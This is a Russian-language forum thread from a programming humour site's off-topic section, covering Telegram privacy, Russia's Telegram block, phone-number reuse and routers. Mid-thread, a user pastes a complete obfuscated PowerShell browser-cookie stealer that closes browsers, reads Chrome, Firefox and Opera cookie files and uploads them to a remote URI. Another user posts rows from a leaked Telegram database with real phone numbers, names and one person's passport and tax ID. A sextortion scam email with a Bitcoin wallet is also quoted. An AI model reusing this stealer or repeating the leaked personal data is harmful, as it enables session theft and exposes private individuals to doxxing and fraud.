Куча / Говнокод #26776 Ссылка на оригинал

+1

  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
  10. 10
  11. 11
  12. 12
  13. 13
  14. 14
  15. 15
  16. 16
  17. 17
  18. 18
  19. 19
  20. 20
  21. 21
  22. 22
  23. 23
  24. 24
  25. 25
  26. 26
IT Оффтоп #49


#1: https://govnokod.ru/18142 https://govnokod.xyz/_18142
#2: https://govnokod.ru/18378 https://govnokod.xyz/_18378
#3: https://govnokod.ru/19667 https://govnokod.xyz/_19667
#4: https://govnokod.ru/21160 https://govnokod.xyz/_21160
#5: https://govnokod.ru/21772 https://govnokod.xyz/_21772
#6: (vanished) https://govnokod.xyz/_24063
#7: https://govnokod.ru/24538 https://govnokod.xyz/_24538
#8: (vanished) https://govnokod.xyz/_24815
#9: https://govnokod.ru/24867 https://govnokod.xyz/_24867
#10: https://govnokod.ru/25328 https://govnokod.xyz/_25328	
#11: (vanished) https://govnokod.xyz/_25436
#12: (vanished) https://govnokod.xyz/_25471
#13: (vanished) https://govnokod.xyz/_25590
#14: https://govnokod.ru/25684 https://govnokod.xyz/_25684
#15: https://govnokod.ru/25694 https://govnokod.xyz/_25694
#16: https://govnokod.ru/25725 https://govnokod.xyz/_25725
#17: https://govnokod.ru/25731 https://govnokod.xyz/_25731
#18: https://govnokod.ru/25762 https://govnokod.xyz/_25762
#19: https://govnokod.ru/25767 https://govnokod.xyz/_25767
#20: https://govnokod.ru/25776 https://govnokod.xyz/_25776
#21: https://govnokod.ru/25798 https://govnokod.xyz/_25798
#22: https://govnokod.ru/25811 https://govnokod.xyz/_25811
#23: https://govnokod.ru/25863 https://govnokod.xyz/_25863

#24: https://govnokod.ru/25941 https://govnokod.xyz/_25941
#25: https://govnokod.ru/26026 https://govnokod.xyz/_26026
#26: https://govnokod.ru/26050 https://govnokod.xyz/_26050
#27: https://govnokod.ru/26340 https://govnokod.xyz/_26340
#28: https://govnokod.ru/26372 https://govnokod.xyz/_26372
#29: https://govnokod.ru/26385 https://govnokod.xyz/_26385
#30: https://govnokod.ru/26413 https://govnokod.xyz/_26413
#31: https://govnokod.ru/26423 https://govnokod.xyz/_26423
#32: https://govnokod.ru/26440 https://govnokod.xyz/_26440
#33: https://govnokod.ru/26449 https://govnokod.xyz/_26449
#34: https://govnokod.ru/26456 https://govnokod.xyz/_26456
#35: https://govnokod.ru/26463 https://govnokod.xyz/_26463
#36: https://govnokod.ru/26508 https://govnokod.xyz/_26508
#37: https://govnokod.ru/26524 https://govnokod.xyz/_26524
#38: https://govnokod.ru/26539 https://govnokod.xyz/_26539
#39: https://govnokod.ru/26556 https://govnokod.xyz/_26556
#40: https://govnokod.ru/26568 https://govnokod.xyz/_26568
#41: https://govnokod.ru/26589 https://govnokod.xyz/_26589
#42: https://govnokod.ru/26600 https://govnokod.xyz/_26600
#43: https://govnokod.ru/26604 https://govnokod.xyz/_26604
#44: https://govnokod.ru/26627 https://govnokod.xyz/_26627
#45: https://govnokod.ru/26635 https://govnokod.xyz/_26635
#46: (vanished) https://govnokod.xyz/_26646
#46: (vanished) https://govnokod.xyz/_26654
#47: https://govnokod.ru/26671 https://govnokod.xyz/_26671
#48: https://govnokod.ru/26707 https://govnokod.xyz/_26707
#49: https://govnokod.ru/26750 https://govnokod.xyz/_26750

Запостил: inkanusinho inkanusinho, (Updated )

Комментарии (492) RSS

    • Да похуй. В пиздец-оффтопе вроде тоже нумерацию просрали.
      Ответить
    • Надо написать высокотехнологичный скрипт для автосоздания новых офтопов. Хотя он будет всего лишь исправлять костыльность сайта.
      Ответить
  • про телеграм-то зачем пост потерли
    Ответить
    • Кстати, как получить аватарки для всей этой таблицы? Только через api.telegram.org, предварительно зарегистрировав бота и получив токен? А без токена никак?
      Ответить
      • Ты хочешь по ним мыло отреверсить?

        З.Ы. О, кстати, а для регистрации бота надо телефон?
        Ответить
          • > ботовым батей

            Ну т.е. надо уже иметь учётку в телеге. Жаль ;(
            Ответить
            • Либо отправить @BotFather сообщение с чужой учётки. Например, взять у кого-нибудь смартфон на пару минут (типа поиграть в «Сердитых птичек»).
              Ответить
              • У меня есть тестовый для Говнокода. Но я тебе не дам.
                Ответить
              • Уже третий раз спрашиваю: ты давно вуз окончил учётка @inkanus - твоя?
                Ответить
                • Если я отвечу, ты получишь очередной бит информации обо мне.

                  Проверь. У тебя вроде есть возможность проверить, у меня нет.
                  Ответить
                    • Напиши что-нибудь этому чуваку. Например, задай вопрос, не регистрировал ли он петухов и обезьян на «Говнокоде».
                      Ответить
                      • Не хочу писать с основной учётки.
                        Ответить
                          • А вдруг этот чувак насрёт на говнокоде и сдеанонит меня?
                            Ответить
                              • А это тут при чем? Если в дискорде ты найдёшь @inkanus, ты по этой же причине не напишешь, если ты подписан как «Антон Новосибирович Бормандов».
                                Ответить
                                • А вот в этом и проблема телеги.

                                  В дискорде я просто юзаю свой ник и теку. Всё, больше никакой инфы про меня там нет.

                                  В телеге же мой ник и аватарку будут видеть все, кто знает мой телефон, что приводит к смешению реальной и виртуальной личностей. И это не айс.

                                  Т.е. я буду вынужден там ставить либо реальную инфу и юзать только для контактов из реала (но для этого уже есть вацап). Либо ставить новую уникальную хуйню, которая ни с чем не коррелирует, что пиздец неудобно для друзей.
                                  Ответить
                                  • Это я понял. Конкретно в этой ветке мы обсуждаем написание инканусу. Он не узнаёт никакой инфы о тебе, кроме той, что ты сам открыл.
                                    Ответить
                                    • Он узнает ник Борманда в «Телеграме», пробьёт по недавно слитой базе и получит его номер телефона.
                                      Ответить
                                      • > получит его номер телефона

                                        Не то чтобы это чему-то угрожало... Но чем меньше инфы растекается по инету - тем спокойнее спать.
                                        Ответить
                                  • > В телеге же мой ник и аватарку будут видеть все
                                    - это если у тебя есть ник и аватарка
                                    Ответить
                                    • А что, там можно быть ноунеймом без нихуя, как айдишник в аське? 🙂
                                      Ответить
                                      • Да. Правда скорее всего это не исключает возможность найти тебя по номеру телефона.
                                        Ответить
                                          • Скорее всего. Точно можно делать обращения в чатах не по нику, а по имени. Значит айдишник публичен.
                                            Ответить
                                      • Совсем ноунеймом нет, но ничего не мешает в качестве имени (не ника) поставить инициалы, например, а остальное тупо не заполнять.

                                        У людей в книжке ты ж всё равно понятно для них записан.
                                        Ответить
                      • Но ты же можешь ответить ему, что не понимаешь о чём речь. Тем более фактор внезапности уже потерян.
                        Ответить
                        • Приведи реальный пример разворачивания событий с Алисой, Бобом, Чаком, Дейвом, Евой, Мэллори, Пегги, Виктором, Трентом и Уолтером.
                          Ответить
                  • > Если я отвечу, ты получишь очередной бит информации обо мне.

                    Не факт. Ты можешь с легкостью напиздеть.
                    Ответить
                      • Откуда ты знаешь про троичную логику? Ты что, математик из раш-ки?
                        Ответить
                        • Откуда ты знаешь, что трит — это про троичную логику? Ты что, ма-те-ма-тик из раш-ки?
                          Ответить
            • ахахах
              Параноикобляди соснули.
              Ответить
        • Оказывается, аватарки можно тупо скачать с сайта t.me. В HTML-коде профиля есть такой элемент:
          <meta property="og:image" content="-- вот тут URL аватарки --">
          Ответить
        • Кстати, про реверс. Один чувак попытался собрать аватарки из «Whatsapp», чтобы потом по ним отреверсить профили в соцсетях:
          https://habr.com/ru/post/262053/

          «Whatsapp» ему за брутфорс несколько номеров забанил, вроде даже навечно. Вот будет прикол, когда номера освободятся, их отдадут другим, и эти люди не смогут зарегистрироваться в «Whatsapp».
          Ответить
        • Кто-то зарегистрировал @virusinho. А ещё там есть @Rustinho, @Shandybinho, @Zaebinho. И вообще всяких -inho много.
          Ответить
          • А сфабрикана посмотри.

            P.S. Вроде нет такого (
            Ответить
            • Нету.

              Зато зашкаливает количество юзеров со словом «govno» в юзернейме.
              Ответить
              • А телефон Дурова в этой базе есть?
                Ответить
                • Есть куча приколистов, подписавшихся Павлом Дуровым (даже с суффиксом _official в никнейме).
                  Ответить
    • В базе две трети телефонных номеров почему-то принадлежат Ирану. Ловим остальные:
      grep -P "^[^,]*,[^,]*,[^,]*,7" t40_xss.csv >ru.csv
      grep -P "^[^,]*,[^,]*,[^,]*,380" t40_xss.csv >ua.csv
      grep -P "^[^,]*,[^,]*,[^,]*,37" t40_xss.csv >sng1.csv
      grep -P "^[^,]*,[^,]*,[^,]*,99" t40_xss.csv >sng2.csv


      Ещё обнаружилось почти две тысячи номеров из гермашки, но все почему-то Саиды, Ахмады, Амиры, Хамиды. Этнические немцы «Телеграмом» не пользуются что ли?
      Ответить
      • У азиатов вообще прикольные учётки:
        24256777,Рашид индивидуальной мебели на заказ.,Изготовление индивидуальной мебели на заказ..,998903178466,464678319,MaStRTaSking,1566982964000
        6551556, Х У Л И Г А Н  ,NE VAZMOJNA VERNUTSA V PROSHLOE I IZMENIT START NO NADO STARTANU,998946222333,72070881,Otabek_T_R,1564591288000
        7334092,\ЗЕЛЁНАЯ АПТЕКА\,+998 91 653 10 90,998916531090,530656044,zelyonayaapteka,1559931440000
        357022,Мубашшир,Мухаммадсобиров Дизайнер,998906422020,733616084,Mubashshirofficial


        Да и у белорусов интересные встречаются:
        7333892,Детский психолог,Юлия Куколева,375291343896,252228823,detskij_psiholog,1569235293000
        Ответить
        • Но самый пиздец — вот эта запись:
          11006325,ПАВЕЛ ЛЕОНИДОВИЧ СИТНИКОВ,Крыса ворующая базы с RaidForums и продающая их в своем канале https://t.me/freedomf0x,79992161984,ИНН 602507478203,Паспорт Серия 5806 № 865451, выдан 18.10.2006
          Ответить
          • Ты эту инфу решил сюда скопировать, чтобы она уже и в поисковиках проиндексировалась и Павел Леонидович до конца веков не отмылся от позора воровства с базы?
            Ответить
            • Кстати, сам Павел Леонидович пишет: «information must flow free, money kill it». Типа он против продажи баз данных. А в его канале сплошные новости:
              https://telemetr.me/content/freedom_fox/

              Возможно, админ RaidForums с ним посрался и решил напакостить.
              Ответить
  • У меня «Гитхаб» глючит. Нашёл в телеграм-канале Павла Леонидовича интересные ссылки, а скачать и посмотреть не могу, вываливается ошибка 500.
    Ответить
    • P.S. Скачал вот эту хрень: https://github.com/swagkarna/hmmcookies

      Собственно код:
      $fire_p = Get-Process firefox -ErrorAction SilentlyContinue; if ($fire_p) { $fire_p.CloseMainWindow();Sleep 2;if (!$fire_p.HasExited) {$fire_p | Stop-Process -Force;}};$chrome_p = Get-Process chrome -ErrorAction SilentlyContinue;if ($chrome_p) {  $chrome_p.CloseMainWindow();  Sleep 2;  if (!$chrome_p.HasExited) { $chrome_p | Stop-Process -Force;  }};$opera_p = Get-Process opera -ErrorAction SilentlyContinue;if ($opera_p) { $opera_p.CloseMainWindow();Sleep 2;  if (!$opera_p.HasExited) { $opera_p | Stop-Process -Force;  }};$uri=$args[0];$chrome=("$Env:USERPROFILE\AppData\Local\Google\Chrome\User "+(('Datak'+'gyDe'+'f'+'au'+'ltkgy'+'Cookie'+'s')  -crePLACe ([cHAr]107+[cHAr]103+[cHAr]121),[cHAr]92));$base64chr=[Convert]::ToBase64String([IO.File]::ReadAllBytes($chrome));$postparamschr="chr=$base64chr";Invoke-RestMethod -Uri $uri -Method Post -Body $postparamschr;$moz=@(Get-ChildItem "$Env:USERPROFILE\AppData\\Roaming\Mozilla\Firefox\Profiles\" -Recurse -Force -Include *cookies.sqlite* -Name);$moz_path="$Env:USERPROFILE\AppData\\Roaming\Mozilla\Firefox\Profiles\";foreach ($f in $moz) {$convert=$moz_path+$f;$base64file=[Convert]::ToBase64String([IO.File]::ReadAllBytes($convert));$postparams="moz=$base64file";Invoke-RestMethod -Uri $uri -Method Post -Body $postparams;};$opera=("$Env:USERPROFILE\AppData\Roaming\Opera "+('Softw'+'are'+'sxa'+'Oper'+'a'+' ').RePlACE(([char]115+[char]120+[char]97),'\')+('S'+'tableWQ2Cook'+'i'+'e'+'s').REpLACE(([char]87+[char]81+[char]50),'\'));$base64opr=[Convert]::ToBase64String([IO.File]::ReadAllBytes($opera));$postparamsopr="opr=$base64opr";Invoke-RestMethod -Uri $uri -Method Post -Body $postparamsopr;


      Лицензия GPL v.3.
      Ответить
      • Я так и знал!
        Осетия, Обама, Остазия, Ось, Океания, Омерика
        , Опиц, собрание Орловых, Осознание. Это все заговор!
        Ответить
    • > никогда не запрещали телеграм

      Дык это правда. Они запретили питоньи баги, кутишный исталлятор и ещё тыщу-другую ни в чём не виноватых сайтов. А телеграм по факту так и не запретили.
      Ответить
      • больше всего досталось jupyter.org и cpu-z 🙂
        Ответить
        • Цифровой Океан даже письмо прислал, что их серваки были разбанены и VPS'ки теперь можно юзать без проблем.
          Ответить
          • Кусок амазоньих паутиньих услуг тоже разбанили
            Ответить
          • Что мешало цифровому океану забанить нахуй телеграм, чтобы он не мешал другим пользователям?
            Ответить
            • всмысле выгнать жирнющего клиента, потому что папуасы в своей папуасии что-то там сломали?

              Лучше сразу закрыть компанию нахуй, потому что после этого никто серьезный там хоститься не будет.
              Нахуй хоститься там, откуда тебя могут выгнать по решению кировочепецкого районного суда?
              Ответить
              • > жирнющего клиента

                Который шатается как слон в посудной лавке, зашкваривая твои айпишники, и не приносит бабло потому что эти прокси живут меньше дня.

                Я думаю у них в TOS есть правило чтобы от таких клиентов по-быстрому избавиться.
                Ответить
                • > не приносит бабло
                  всмысле? Он типа бесплатно там хостится что-ли?
                  Ответить
                  • Ну а сколько там эти прокси жили? Хостер за это время получал сраные копейки, а гемор с переиспользованием этого айпишника для нормальных клиентов оставался.

                    Вполне логично такого клиента выгнать нахуй. По пункту о нанесении ущерба инфраструктуре, к примеру. Пусть воюет за швабодку в другом месте.
                    Ответить
                    • там было такое количество траффика через них, что не думаю, что это были копейки. Обычно с такими слонами отдел продаж договаривается лично о "гибкой ценовой политике"

                      >Пусть воюет за швабодку в другом месте.
                      Чтобы потом все SJW написали, что DO помогает диктаторам, угу
                      Ответить
                      • Тем не менее, гугл с амазоном как бы невзначай запретили domain fronting. Типа для защиты от малвари, которая юзает те же приёмы с кучей плавающих по облаку айпишников. Телеграм тут само собой не при делах, просто совпало по времени.

                        Видимо у DO так не прокатило т.к. у них реальные VPS'ки а не облачная хуйня. Ну или их не так сильно зацепило блокировками.
                        Ответить
                        • Правильно сделали, телеграм — это рак на теле интернетов, а ещё в нём сидят одни террористы и норкоманы.
                          Ответить
                        • Так это совсем другое дело получается.

                          Если ты говоришь Телеграму "прости, я прогнулся под х@@ло, и вынужден тебя выгнать", то ты понос уровня мейлру, и ни один приличный человек тебе руки не подаст после этого.

                          А если ты говоришь "в целях борьбы с malware мы вносим некоторые технические изменения", то это твое полное право.

                          Ты перестал походить для задач телеграма?
                          Как жаль. Но это же не твоя вина
                          Ответить
                          • Кстати у DO например есть замечательный пункт про "retaliation against DO" - запрещены любые действия, которые могут привести к возмездию против их сервисов и сотрудников.

                            И судя по тому, что Паша начал спонсировать рандомных добровольцев на поднятие проксей для телеги, оттуда его тоже мягко пидорнули.
                            Ответить
                            • Интересная логика.

                              В стране Банановый Берег запрещено использовать букву "ы".
                              Я разместил на DO сайт, со словом "ныпырсытет", и хакеры из правительства Бананового Берега начали ддосить DO.

                              Мой сайт могут удалить?
                              Ответить
                              • Да. DDoS их серверов там прям как пример этого самого возмездия приведён.
                                Ответить
                                    • А могли бы просто конкретно этот IP гасить, и всё. На время. Ддос не вечен же.

                                      У BGP есть коммунити расширение такое (блек хол вроде), когда ты просишь всех своих пиров не слать ничего на определенный префикс, и весь DDOS отправляется в помойку еще на подлёте
                                      Ответить
                                      • > блек хол
                                        Да, именно оно. Если точнее — весь трафик на проблемный IP просто роутится в 0.0.0.0. Собственно, обычно провайдеры так и делают (причём чаще всего в автоматическом режиме), удаление сервера — крайняя мера, когда на клиента сыпется слишком уж неадекватное количество атак.
                                        Реальный пример письма щщастья: https://i.imgur.com/zyBksxG.png (говноконтора, кстати, не рекомендую).
                                        Ответить
                                        • Я имел ввиду вот это
                                          https://tools.ietf.org/html/rfc7999
                                          Сообщество "афроамериканская дыра"

                                          А Виталий твой VDS прикрыл, или откуда ты это взял?
                                          Ответить
                                          • > Сообщество "афроамериканская дыра"
                                            А, такую штуку не встречал.

                                            > А Виталий твой VDS прикрыл, или откуда ты это взял?
                                            Мой, старая история. В конце там Дмитрий забанил этот IP навечно.
                                            Ответить
                                            • Ну вот смысл дырки в том, что даже если провайдер выкинет весь траффик в null, то всё равно к нему этот траффик придет.

                                              Вот у провайдера есть пять пиров, и с каждого пира к нему течет говно на твой IP. Он может за этот траффик платить (смотря какие отношения с пирами), траффик этот забивает канал, итд.

                                              Ну вот в BGP есть т.н. "коммунити расширения", которые пиры могут понимать

                                              Пров шлет своим пирам расширение "пожалуйста, выкидывайте в мусор траффик на 1.2.3.4", они его принимают к сведению.

                                              Причем каждому пиру достается мааахонький кусочек траффика, и ему его грохнуть проще.

                                              А за что тебя досили?
                                              Ответить
                                              • > Пров шлет своим пирам расширение "пожалуйста, выкидывайте в мусор траффик на 1.2.3.4", они его принимают к сведению.
                                                А, понял.

                                                > А за что тебя досили?
                                                В одной старенькой игре играли в войнушку. Взломы, дудосы, дефейсы, вот это всё. Бюджет пять баксов, на входе пара гигабит, пинг критичен. Собственно, с тех пор у меня развились ПТСР и маниакальное желание прикрывать IP-адреса за «Cloudflare».
                                                Ответить
                                                • Странные игры какие.
                                                  Ты в молодости был хакером?
                                                  Ответить
                                                  • Нет, товарищ майор, я за другую команду играл. Хакерами были мои хорошие знакомые. Ну и ребята в противоположном углу ринга, конечно.
                                                    Ответить
      • "Чисто технически, никто не запрещал телеграм.
        Они запрещали провайдерам предоставлять доступ в телеграм.
        Как вы не понимаете? Это другое!"
        Ответить
        • Ну да. Если бы запретили телеграм, то любители телеги уже сидели бы или штрафы отрабатывали. Что не так?
          Ответить
          • В России не запрещено покупать пиво после 22, есть просто техническое решение о запрете на его продажу.

            В СССР не было запрета на выезд отказникам, было просто техническое решение о непропускании их через границу.
            Ответить
            • Запрещено продавать пиво после 22. И за это реально можно залететь.

              А покупать ты даже наркоту можешь, если немного.
              Ответить
              • Ну вот видишь, значит покупать всё таки можно.

                А что у тебя нет возможности купить пиво после 22х или открыть bugs.python.org -- это твои проблемы. Государство не виновато
                Ответить
                • Ну дык и телеграм юзать можно было. А вот предоставлять к нему доступ - нет.
                  Ответить
                  • А еще в России нет запрета на европейские продукты. Покупать их никто не запрещает
                    Ответить
    • А когда при скачивании сайты вместо телеги выдавали "В рашке низзя" это была их собственная инитиатива?
      Ответить
      • Дык предоставлять доступ было нельзя, вот они и не предоставляли.
        Ответить
        • не предоставлять не доступ не было нельзя, вот не они и не предоставляли
          Ответить
        • А сорян, я до этого момента даже не открывал статью.

          Какой мягкий запрет )))

          Это как конфеты прятать от детей на верхней полке. Даже если свиснешь, тебе максимум пальчиком погрозят и перепрячут в другое место.
          Ответить
          • Дык почти все запреты обычно так работают - продажа, хранение, изготовление. Но приобретение для личного использования не наказывается.

            Но если ты сразу возьмёшь весь мешок конфет, больше чем можешь съесть за раз - то тебе скорее всего запишут хранение.
            Ответить
            • А если взять конфетки себе и другу, даже если по одной, то меня в конфеткокурьеры запишут?
              Ответить
  • Парни, помогите, что мне делать?

    3дрaвcтвуйте!
    Я прогрaммиcт, кoторый взломaл 0С вaшeго уcтройcтвa.
    Я нaблюдaю зa вaми ужe неcколько мecяцев. Дело в том, что вы были зaрaжены вредоноcным П0 черeз caйт для взроcлых, который вы поcетили.
    Еcли вы не знaкомы c этим, я объяcню. Троянcкий вируc дaет мне полный доcтуп и контроль нaд компьютером или любым другим уcтройcтвом. Это ознaчaет, что я могу видеть вcе нa вaшем экрaне, включить кaмеру и микрoфон, но вы нe знaетe oб этом.
    У меня тaкже еcть доcтуп ко вcем вaшим контaктaм, дaнным по cоциaльным cетям и вcей вaшей пeрепиcке.
    Почему вaш aнтивируc не обнaружил вредоноcное ПO Ответ: Моя вредоноcнaя прогрaммa иcпользует дрaйвер, я обновляю его cигнaтуры кaждые 4 чaca, чтобы вaш aнтивируc молчaл.
    Я cделaл видео, покaзывaющее, кaк вы удовлетвoряeте cебя в левой половине экрaнa, a в прaвой полoвине вы видите видео, которое вы cмотрели. одним щелчком мыши я могу отпрaвить это видео нa вcе вaши контaкты из почты и cоциaльных ceтей. Я тaкже могу oпубликовaть доcтуп ко вcей вaшей электронной почте и меccенджерaм, которые вы иcпользуете.
    еcли вы хoтите предoтврaтить это, тo: Перeвeдите 650$(USD) нa мой биткoин-кошeлек (еcли вы не знaете кaк это cделaть, то нaпишите в Google: "Купить биткойн").
    Мой биткойн-кошелек (BTC Wallet): 
    1ACHvWHiXDm77aKBk4b7MXugsv4xo3ghpE
    Пocле пoлучения оплaты я удaлю видеo, и вы никогдa меня бoльше не уcлышите. Я дaю вaм 50 чacов (более двух дней) для оплaты. У меня еcть уведомление о прочтении этого пиcьмa, и тaймер cрaботaет, когдa вы увидите это пиcьмо.
    Не пытaйтеcь мне отвечaть. Это беccмыcленно (aдреc отпрaвителя генерируетcя aвтомaтичеcки). Подaчa жaлобы кудa-либо не имеет cмыcлa, потому что это пиcьмо не может быть отcлежено, кaк и мой биткойн-aдреc. Я не делaю ошибок.
    Еcли я обнaружу, что вы поделилиcь этим coобщениeм c кем-то eще, видeо будет нeмедленно рacпроcтрaнeно.
    Удачи!
    Ответить
    • Привет.
      Лучше конечно заплатить, но только кошелек указан неверно.
      Дай мыло, я скину тебе правильный номер кошелька
      Ответить
        • Кстати, давно хотел спросить: ты не знаешь, КАК ПОЛУЧАТЬ КАЧЕСТВЕННОЕ ПОЛИМЕРНОЕ
          СЫРЬЁ ТОЧНО В СРОК, ПО ОПТИМАЛЬНЫМ ЦЕНАМ И БЕЗ ГОЛОВНОЙ БОЛИ?

          >А без оплаты никак нильзя???
          Это зависит от того, какие сайты для взрослых ты смотрел.
          Скажи пару адресов, и что ты там смотрел.
          Так же понадобится твой адрес вконтакте
          Ответить
    • > что мне делать
      > если я обнаружу, что вы поделились этим сообщением

      Ну, поскольку ты поделился этим сообщением, остаётся расслабиться и получать удовольствие.
      Ответить
    • "Я cделaл видео, покaзывaющее, кaк вы удовлетвoряeте cебя в левой половине экрaнa, a в прaвой полoвине вы видите видео, которое вы cмотрели. одним щелчком мыши я могу отпрaвить это видео нa вcе вaши контaкты из почты и cоциaльных ceтей. Я тaкже могу oпубликовaть доcтуп ко вcей вaшей электронной почте и меccенджерaм, которые вы иcпользуете. еcли вы хoтите предoтврaтить это, тo: Перeвeдите 650$(USD) нa мой биткoин-кошeлек (еcли вы не знaете кaк это cделaть, то нaпишите в Google: "Купить биткойн"). Мой биткойн-кошелек (BTC Wallet): 1ACHvWHiXDm77aKBk4b7MXugsv4xo3ghpE Пocле пoлучения оплaты я удaлю видеo, и вы никогдa меня бoльше не уcлышите. Я дaю вaм 50 чacов (более двух дней) для оплaты. У меня еcть уведомление о прочтении этого пиcьмa, и тaймер cрaботaет, когдa вы увидите это пиcьмо."
      Ответить
    • > Total Bitcoin Received 0.70203365 BTC
      Какие $6500 на халяву )))
      Ответить
      • Кажется, подобное уже обсуждали здесь, что мы не тем занимаемся.
        Ответить
        • Да нафиг такую работу... Потом придётся бухать чтобы развидеть всю жесть, которая там у людей на камерах и в мессенджерах.
          Ответить
          • зачем? ты просто шли такое письмо всем людям, и всё.
            Стопудово каждый второй дрочил или на несовершеннолетних, или на бдсм, или на камерунских негров
            Ответить
  • Арам-цам-цам
    Арам-цам-цам
    Гули-гули-гули-гули-гули рам-цам-цам
    Арам-цам-цам
    Арам-цам-цам
    Гули-гули-гули-гули-гули рам-цам-цам
    Аыыыыыыыыыа
    Аыыыыыыыыыа
    Гули-гули-гули-гули-гули рам-цам-цам
    Ответить
  • Поставил ебучий «Viber» на второе устройство - чаты не перенеслись. Это говно хранит всё локально?
    Ответить
    • > чаты не перенеслись

      Радуйся. А то потом номер сменишь и они перенесутся новому владельцу. Опсосы же им не кидают уведомление о том что номер сдох.

      З.Ы. У вацапа вроде какой-то бекап можно было выгрузить. Может и тут тоже такая механика есть.
      Ответить
      • Хуета какая-то. У телеги удаляется акк, если 3 месяца - год (в настройках можно менять) не пользовался.
        Ответить
        • А если новый владелец номера за эти 3 месяца успеет накатить телегу, то что будет?
          Ответить
          • Опсосы через сколько симку продают после неиспользования?
            Ответить
            • А хер знает, сразу после освобождения номера скорее всего могут продать. Ну какое-то время пройдёт пока твой номер попадёт в конвертики с симками, конечно. Но я не думаю что они специально какой-то таймаут выдерживают.

              Т.е. если ты идёшь расторгать договор, то лучше телегу ёбнуть заранее.
              Ответить
              • Если проебать, то какое-то время номер будет жить неактивным, у мегафона полгода вроде.
                Ответить
                • Ну время от последнего платного действия до расторжения договора и блокировки симки - да, где-то полгода. А вот через какое время после расторжения они смогут продать симку - х.з.

                  Я полгода на мтс не юзал. Когда пришёл в офис чтобы восстановить, мне сказали что номер уже у другого чела.

                  Т.е. продают довольно быстро. И скорее всего это не какая-то формализованная задержка для твоей защиты, а просто время пока симка дойдёт до прилавка и будет продана.
                  Ответить
                  • Я с этими рассказами стану скоро таким же симкопараноиком, как и вы!
                    Ответить
                    • У меня тоже есть реальные примеры, когда номер продавали новому челу чуть ли не на следующий день после расторжения договора.
                      Ответить
                      • Кстати у всех операторов офигенная политика - они по таймауту подключают услугу, которая довольно быстро сливает бабло со счёта. И когда дойдёт до нуля - договор расторгают. В итоге они тебе ничего не должны если ты вдруг проснёшься и вспомнишь про старую симку.
                        Ответить
                        • Сейчас ещё и сроки урезали. Теперь уже не полгода, а меньше.
                          Ответить
                      • Реальный пример педерачи номера телефона с «Телеграмом» кому-то другому:
                        Telegram, [00.00.18 10:13]
                        ВНИМАНИЕ. Запрос на сброс аккаунта.
                        
                        gost, мы получили запрос на удаление аккаунта в Telegram, привязанного к номеру телефона
                        +380. Если Вы не хотите, чтобы аккаунт был удален, отмените это по следующей ссылке:
                        https://t.me/confirmphone?phone=380&hash=kokoko
                        
                        Эта ссылка будет действовать ещё 7 дней. Если за это время Вы не отмените запрос, то Ваш
                        аккаунт будет удален со всей перепиской, файлами и контактами, тогда пароль от двухэтапной
                        аутентификации будет сброшен.
                        
                        Если у Вас больше нет доступа к указанному номеру телефона, пожалуйста, обновите номер в
                        настройках приложения.
                        
                        С уважением,
                        Команда Telegram
                        
                        
                        Telegram, [00.00.18 10:17]
                        Незавершенная попытка входа. gost, мы обнаружили попытку входа в Ваш аккаунт с нового
                        устройства 00/00/2018 в 07:12:44 UTC.
                        
                        Устройство: Android
                        Место: Germany (IP = 185.220.102.7)
                        
                        Никто не получил доступ к Вашей переписке, потому что входа в аккаунт не произошло. Код
                        был введен верно, но правильный пароль указан не был.
                        
                        Если это были не Вы, перейдите в Настройки > Конфиденциальность > Активные сеансы и
                        сбросьте незавершенную попытку входа.
                        
                        
                        Telegram, [00.00.18 12:12]
                        Вы изменили номер телефона на +380 и успешно отменили удаление Вашего аккаунта. Все
                        данные аккаунта благополучно сохранятся.
                        
                        Для безопасности аккаунта важно, чтобы у Вас всегда был указан актуальный номер телефона.

                        В тот раз я оказался быстрее и успешно поменял номер на другой (разумеется, тоже на одноразовый мусоросборник).
                        Кстати, интересно, что аккаунт пытались сбросить из «Tor»: видимо, какая-то массовая закупка акков для спама.
                        Ответить
                      • В общем-то, на мыльном сервисе, по крайней мере, на говне типа мейлру, тоже есть риск потерять адрес, если долго не пользоваться.

                        Но почту я могу с еблей и танцами самому себе поднять на впске и параноить по полной, а вот свой опсос мне нихуя никогда не светит.
                        Ответить
                        • Ну почта всё-таки меньше от внешних факторов зависит.

                          А номер банальный переезд в другой регион не переживает. Благо хоть между операторами сейчас переходить можно.
                          Ответить
          • И я залогинен в нескольких устройствах, и смогу удалить акк в случае проёба как симки, так и телефона.
            Ответить
          • Если ты не защитил акк паролем (ЕМНИП, «Cloud password»), то новый владелец получит джекпот в виде твоей переписки с камерунскими хуями.
            Ответить
            • А какие способы для восстановления этого пароля есть? Явно не телефон же, это было бы смешно.
              Ответить
              • Хуй знает, не пробовал. По идее никаких не должно быть, иначе это действительно получается не 2-F, а самый простой 1-F.
                Ответить
        • Не знаю, по-моему очень правильная политика, что всё локально на девайсе хранится. И ты сам отвечаешь за бекапы.

          Раньше, до ебучих облаков, все чатики так делали и никого это особо не парило.
          Ответить
          • Ой, да просто не могут себе позволить хостить все данные, как Пашка. Очень удобно читать переписку со всех устройств.
            Ответить
            • Да хуйню он сделал, если честно.

              Номер телефона - очень плохой идентификатор, в отличие от того же емейла. Но он снижает порог вхождения, а пашке нужно больше юзеров.

              Если бы первичным идентификатором было мыло, а телефон бы юзался только как второй фактор, то ты бы вообще не задумывался о проёбе номера. И тебе не пришлось бы удалять аккаунт с проёбом всей переписки при смене номера.

              Не знаю почему ты оправдываешь эту говноархитектуру.
              Ответить
  • Ебучие вроутеры.
    Вот если у меня логин/пароль не admin/admin, то как, блядь, теперь это вспомнить??? А всё из-за «это стандартный логин, низя», «это стандартный пороль, низя».
    Ответить
      • Ещё и cooldown 60 секунд после каждого пятого ввода.
        Ответить
    • Да сбрось его. Пароль от вайфая же у тебя остался на девайсах, можно будет восстановить.
      Ответить
      • Лень опять звонить провайдеру, если придётся. Они мне в прошлый раз какие-то айпишники надиктовывали. Они у меня записаны на листочке, но я не помню что это за айпишники, где их вводить в настройках, и нахуя (но без них не пашет).

        У меня инет не пашет, они говорят что не видят, что какое-либо устройство вообще подключено. Хотя если я отключаю от вроутера кабель, перестаёт гореть лампочка, значит кабель не поврежден.
        Ответить
        • >Лень
          ну тогда сохрани конфиг вроутера себе на комп, чтобы не пирдолицо зноу
          Ответить
        • Погугли тогда CVE-шки на свою модель. Если у тебя бульмень массовое (китайское) устройство и ты его не обновлял, то с большой вероятностью у него есть дыры, в которые можно (локально) пролезть.
          Ответить
          • Нихуя себе совет )))
            А ВК страничку сможешь взломать?
            Ответить
